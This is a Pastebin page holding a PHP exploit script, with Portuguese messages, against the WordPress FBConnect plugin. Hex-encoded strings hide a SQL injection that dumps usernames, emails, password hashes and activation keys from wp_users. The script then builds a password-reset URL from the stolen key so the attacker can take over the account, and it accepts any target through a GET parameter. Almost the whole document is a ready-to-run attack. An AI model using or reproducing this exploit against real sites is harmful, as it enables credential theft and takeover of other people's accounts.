Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- ###################################################################
- EXPLOIT CMS WORDPRESS / FBCONNECT
- By: GoogleINURL
- ref:http://pastebin.com/fQbmiGer
- ###################################################################
- */
- error_reporting(0);
- set_time_limit(0);
- ini_set("default_socket_timeout", 5);
- global $dados;
- function msg($msg, $erro = NULL) {
- echo "<p><b>{$msg}</b></p>";
- (isset($erro)) ? exit() : NULL;
- }
- function montaUrlfinal($config, $dados) {
- $config['url'] = (isset($config['url'])) ? $config['url'] . hex2bin('2F77702D6C6F67696E2E7068703F616374696F6E3D7270266B65793D5B4B45595D266C6F67696E3D5B4E4F4D455F5553554152494F5D') : msg('FALHA!', 1);
- return str_replace(array('[NOME_USUARIO]','[KEY]'), $dados,$config['url']);
- }
- function eviarPacote($config, $op) {
- $exploit['1'] = hex2bin('2F3F6662636F6E6E6563745F616374696F6E3D6D79686F6D652666627573657269643D312B616E642B313D322B756E696F6E2B73656C6563742B312C322C332C342C352C636F6E6361742830783743374337432C757365725F6C6F67696E2C30783743374337432C757365725F656D61696C2C30783743374337432C757365725F61637469766174696F6E5F6B65792C30783743374337432C757365725F706173732C3078374337433743292C372C382C392C31302C31312C31322B66726F6D2B77705F75736572732D2D');
- $exploit['2'] = '/wp-login.php?action=lostpassword';
- switch ($op) {
- case '1':
- msg('PEGANDO INFOS user_login');
- $config['url'] = $config['url'] . $exploit['1'];
- break;
- case '2':
- msg('DIGITAR DADOS');
- $config['url'] = $config['url'] . $exploit['2'];
- break;
- default :
- msg('ERRO DE EXECUÇÃO', 1);
- }
- $c = curl_init();
- curl_setopt($c, CURLOPT_URL, $config['url']);
- curl_setopt($c, CURLOPT_USERAGENT ,"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
- curl_setopt($c, CURLOPT_HEADER, 1);
- curl_setopt($c, CURLOPT_NOBODY, 0);
- curl_setopt($c, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($c, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
- curl_setopt($c, CURLOPT_VERBOSE, 1);
- $corpo = (curl_exec($c));
- if (isset($corpo)) {
- return count(explode('|||', $corpo) > 1) ? explode('|||', $corpo) : msg('FALHA!', 1);
- } else {
- return msg('FALHA NA EXECUÇÃO', 1);
- }
- }
- if (isset($_GET['url']) && !empty($_GET['url'])) {
- $config['url'] = $_GET['url'];
- $result = eviarPacote($config, 1);
- $dados['user'] = $result['1'];
- $dados['key'] = $result['3'];
- $url = montaUrlfinal($config,$dados);
- echo "<a href='{$url}' target='_black'>{$url}</a>";
- msg("USER:::: {$dados['user']}").msg("EMAIL:::: {$result['2']}").msg("SENHA:::: {$result['4']}").msg("USE_ACTIVATION_KEY:::: {$dados['key']}");
- echo "<iframe src='{$config['url']}/wp-login.php?action=lostpassword' width='900' height='900'>";
- } else {
- print"Defina a url alvo.\r\n";
- unset($alvo);
- exit();
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement